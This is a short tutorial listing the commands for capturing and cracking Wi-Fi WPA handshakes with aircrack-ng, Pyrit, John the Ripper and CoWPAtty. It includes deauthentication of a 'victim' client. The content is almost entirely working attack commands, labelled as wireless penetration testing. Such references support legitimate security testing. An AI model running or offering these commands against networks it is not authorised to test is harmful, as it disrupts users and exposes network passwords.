How to Crack WPA Handshake: A Comprehensive Guide

How to Crack WPA handshake nowadays can be easy or can take an eternity, here I will explain the tools and techniques used by professionals.

Capture WPA Handshake

airmon-ng start <INTERFACE> <channel>

airodump-ng -c <CHANNEL> --bssid <BSSID> -w <FILENAME> wlan0mon

aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon

Crack WPA Handshake Methods

Dictionary mode

Cracking WPA handshakes with a wordlist is the most common procedure

aircrack-ng -w <WORDLIST> <.CAP FILENAME>

Database mode

aircrack-ng -r <DB NAME> <.CAP FILENAME>

Cracking WPA with Pyrit

airmon-ng start <INTERFACE> <CHANNEL>

pyrit -r <INTERFACE> -o <FILENAME> stripLive

aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon

Dictionary mode

pyrit -r <.CAP FILENAME> -i <WORDLIST> -b <BSSID> attack_passthrough

Database mode

pyrit -i <WORDLIST> import_passwords

pyrit -e <ESSID> create_essid

pyrit batch

pyrit -r <.CAP FILENAME> -b <BSSID> attack_db

Cracking WPA with John the Ripper (JTR)

./john --wordlist=<WORDLIST> --rules --stdout | aircrack-ng -e <ESSID> -w - <.CAP FILENAME>

Cracking WPA with CoWPAtty

cowpatty -r <.CAP FILENAME> -f <WORDLIST> -s <ESSID>

John Cracker

wireless penetration testing